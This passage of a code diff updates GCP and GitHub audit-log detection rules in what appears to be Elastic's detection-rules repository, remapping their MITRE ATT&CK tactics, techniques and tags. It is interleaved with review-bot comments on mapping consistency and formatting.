= "https://attack.mitre.org/techniques/T1580/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -93,3 +77,10 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_error_code.toml b/rules/integrations/gcp/ml_gcp_rare_error_code.toml index 00a36b532e7..9548cd29f37 100644 --- a/rules/integrations/gcp/ml_gcp_rare_error_code.toml +++ b/rules/integrations/gcp/ml_gcp_rare_error_code.toml 
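Review bot: After this hunk the Lateral Movement and Privilege Escalation entries still carry no technique; they survive only as `[rule.threat.tactic]` stubs that justify a `Tactic:` tag without any technique-level coverage, whereas the sibling `ml_gcp_rare_error_code.toml` in this same commit removes its tactic-only entries altogether. Either attach the technique each tactic is meant to represent, which is hard to justify for an error-message spike, or drop the two stubs and their `Tactic: Lateral Movement` / `Tactic: Privilege Escalation` tags as was done for the sibling rule, so the two ML rules follow one convention.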
@@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -59,60 +59,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 6ba99513f42..51d17298fe6 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml 
@@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -49,25 +49,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "f20d1782-e783-4ed0-a0c4-946899a98a7c" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +64,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index c151731755a..d74d7edbfd5 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -49,25 +49,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "dcbd07f8-bd6e-4bb4-ac5d-cec1927ea88f"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: GCP",
- "Data Source: GCP Audit Logs",
- "Data Source: Google Cloud Platform",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
@@ -77,3 +64,8 @@ reference = "https://attack.mitre.org/techniques/T1078/"
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml
index 0474776c35d..40c44ea56b8 100644
--- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml
+++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml
@@ -4,7 +4,7 @@ integration = ["gcp"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/11/21"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -48,25 +48,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "2e08f34c-691c-497e-87de-5d794a1b2a53"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: GCP",
- "Data Source: GCP Audit Logs",
- "Data Source: Google Cloud Platform",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
@@ -77,41 +64,7 @@ id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1021.007"
-name = "Cloud Services"
-reference = "https://attack.mitre.org/techniques/T1021/007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
-[[rule.threat.technique]]
-id = "T1041"
-name = "Exfiltration Over C2 Channel"
-reference = "https://attack.mitre.org/techniques/T1041/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
index 6060132006a..2a88a807bf8 100644
--- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
+++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -68,14 +68,7 @@ references = [
 risk_score = 21
 rule_id = "9890ee61-d061-403d-9bf6-64934c51f638"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: GCP",
- "Data Source: Google Cloud Platform",
- "Use Case: Identity and Access Audit",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -86,14 +79,13 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique]]
+id = "T1531"
+name = "Account Access Removal"
+reference = "https://attack.mitre.org/techniques/T1531/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
index 84d9cc8278b..271bbc2248a 100644
--- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
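Review bot: After the `-86,14 +79,13` hunk the only tactic on `persistence_gcp_iam_service_account_key_deletion.toml` is Impact (TA0040 / T1531), so the `persistence_` prefix in the file name no longer reflects the rule's mapping; the same drift appears below for `execution_github_app_deleted.toml` (now Defense Evasion), `execution_new_github_app_installed.toml` (now Persistence) and `impact_github_repository_activity_from_unusual_ip.toml` (now Collection). If the repository treats the path as stable and `rule_id` as the identity this is cosmetic, but either a rename in the same PR or a line in the description saying file names are deliberately left alone would stop the next reader from inferring the tactic from the path. The `Tactic: Impact` tag added in the `-68,14 +68,7` hunk does match the new tactic table, which is the pairing the rest of the PR is trying to enforce.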
+++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml
index 64c798841be..0bace523e6a 100644
--- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml
+++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,14 +83,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
+[[rule.threat.technique.subtechnique]]
+id = "T1136.003"
+name = "Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1136/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
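Review bot: In the `-87,14 +87,18` hunk the new `[[rule.threat.technique.subtechnique]]` table is added as four consecutive `+` lines directly after the technique's `reference`, with the only added blank line going after `framework` instead, so the sub-technique appears to sit flush against the table it refines while `exfiltration_high_number_of_cloning_by_user.toml` in this same PR separates every table with a blank line. The same tight layout shows up in `persistence_gcp_service_account_created.toml` just below, in the new `[rule.threat.tactic]` tables of `execution_github_high_number_of_cloned_repos_from_pat.toml` and `initial_access_github_actions_bot_first_push_to_repo.toml`, in `initial_access_github_register_self_hosted_runner.toml` where the removed blank before `[rule.threat.tactic]` is not restored, and in `persistence_github_org_owner_added.toml`. TOML does not care, but one blank line per table keeps these files diffable table by table, and a pass through the repository's TOML formatter would normalize all of them at once.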
diff --git a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml
index 505b0df6390..b99c21b1bb6 100644
--- a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml
+++ b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml
@@ -2,7 +2,7 @@ creation_date = "2023/08/29"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -72,19 +72,13 @@ configuration where event.dataset == "github.audit"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml
index 5bf9ba190ef..0358e321943 100644
--- a/rules/integrations/github/execution_github_app_deleted.toml
+++ b/rules/integrations/github/execution_github_app_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2023/10/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -50,13 +50,7 @@ GitHub Apps are integrations that extend GitHub's functionality, often used to a
 risk_score = 21
 rule_id = "fd01b949-81be-46d5-bcf8-284395d5f56d"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -67,14 +61,13 @@ configuration where event.dataset == "github.audit" and github.category == "inte
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1648"
-name = "Serverless Execution"
-reference = "https://attack.mitre.org/techniques/T1648/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
index 723fabe54ae..91e435a1640 100644
--- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
+++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
@@ -2,7 +2,7 @@ creation_date = "2023/10/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -52,14 +52,7 @@ Personal Access Tokens (PATs) facilitate automated access to GitHub repositories
 risk_score = 21
 rule_id = "fb0afac5-bbd6-49b0-b4f8-44e5381e1587"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Use Case: UEBA",
- "Tactic: Execution",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -72,17 +65,29 @@ github.repository_public:false
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1648"
-name = "Serverless Execution"
-reference = "https://attack.mitre.org/techniques/T1648/"
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
 [rule.threshold]
 field = ["github.hashed_token"]
 value = 1
diff --git a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml
index 1bd5931c41a..14f7d975ce4 100644
--- a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml
+++ b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml
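Review bot: The new Collection entry in the `-72,17 +65,29` hunk maps the bare technique T1213 for a rule that counts repository clones made with a PAT, while the two sibling clone rules touched by this same PR (`exfiltration_high_number_of_cloning_by_user.toml`, `impact_github_repository_activity_from_unusual_ip.toml`) map T1213 together with the T1213.003 `Code Repositories` sub-technique. Adding the same sub-technique table here keeps the three clone-based rules aligned and gives analysts the more specific mapping; the table below is the one those two files use, placed after the T1213 `reference` line.
```toml
reference = "https://attack.mitre.org/techniques/T1213/"

[[rule.threat.technique.subtechnique]]
id = "T1213.003"
name = "Code Repositories"
reference = "https://attack.mitre.org/techniques/T1213/003/"
```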
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2023/12/14"
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -70,14 +70,6 @@ signal.rule.tags:("Use Case: UEBA" and "Data Source: Github") and kibana.alert.w
 '''
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.threshold]
 field = ["user.name"]
 value = 1
diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml
index d7a9a7fb68d..3494dfa9a97 100644
--- a/rules/integrations/github/execution_new_github_app_installed.toml
+++ b/rules/integrations/github/execution_new_github_app_installed.toml
@@ -2,7 +2,7 @@ creation_date = "2023/08/29"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -55,13 +55,7 @@ GitHub Apps enhance functionality by integrating with repositories and organizat
 risk_score = 47
 rule_id = "1ca62f14-4787-4913-b7af-df11745a49da"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -72,14 +66,13 @@ configuration where event.dataset == "github.audit" and event.action == "integra
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1072"
-name = "Software Deployment Tools"
-reference = "https://attack.mitre.org/techniques/T1072/"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml
index 13367f9a56f..9a1b9aa5c52 100644
--- a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml
+++ b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/02/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -50,14 +50,7 @@ This rule flags when a previously private repository is made public, a high-risk
 risk_score = 21
 rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
- "Tactic: Impact",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -68,11 +61,6 @@ event.action == "repo.access" and github.previous_visibility == "private" and gi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
 [[rule.threat.technique]]
 id = "T1567"
 name = "Exfiltration Over Web Service"
@@ -87,11 +75,3 @@ reference = "https://attack.mitre.org/techniques/T1567/001/"
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
index b0f024d3a6b..32b3e7e8da2 100644
--- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
+++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -54,13 +54,7 @@ references = [
 risk_score = 47
 rule_id = "19f3674c-f4a1-43bb-a89c-e4c6212275e0"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -90,21 +84,29 @@ from logs-github.audit-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1213.003"
+name = "Code Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/003/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1020"
 name = "Automated Exfiltration"
 reference = "https://attack.mitre.org/techniques/T1020/"
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1567.001"
-name = "Exfiltration to Code Repository"
-reference = "https://attack.mitre.org/techniques/T1567/001/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
index 46b687e9fdb..210386f4349 100644
--- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
+++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -24,15 +24,7 @@ references = [
 risk_score = 21
 rule_id = "daf2e0e0-0bab-4672-bfa1-62db0ee5ec22"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Impact",
- "Tactic: Initial Access",
- "Tactic: Persistence",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -42,42 +34,20 @@ event.dataset:"github.audit" and event.action:("git.push" or "git.clone") and gi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1195"
-name = "Supply Chain Compromise"
-reference = "https://attack.mitre.org/techniques/T1195/"
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
 [[rule.threat.technique.subtechnique]]
-id = "T1195.002"
-name = "Compromise Software Supply Chain"
-reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1213.003"
+name = "Code Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/003/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["source.ip", "github.repo"]
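Review bot: The rebuilt mapping in the `-42,42 +34,20` hunk leaves only Collection / T1213.003, yet the hunk-header context shows the query matching `event.action:("git.push" or "git.clone")`; reading repository contents fits a clone, but a push from an unusual IP is a write that this mapping no longer describes. This same PR maps push-side behaviour to Impact / T1565.001 `Stored Data Manipulation` in the force-push rules, so either a second `[[rule.threat]]` entry with that tactic (plus `Tactic: Impact` in `tags`) would cover both actions, or the query could be narrowed to `git.clone` if Collection is the intended scope. On the removed side, `Tactic: Persistence` had no matching threat entry and the Execution entry had no tag, so the old file is exactly the kind of tag/tactic drift this PR is cleaning up; it is worth confirming the new pair stays aligned if a second entry is added.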
diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
index 56e1f025d29..7bd22d1ff22 100644
--- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -54,14 +54,7 @@ references = [
 risk_score = 47
 rule_id = "098bd5cc-fd55-438f-b354-7d6cd9856a08"
 severity = "medium"
-tags = [
- "Domain: Cloud",
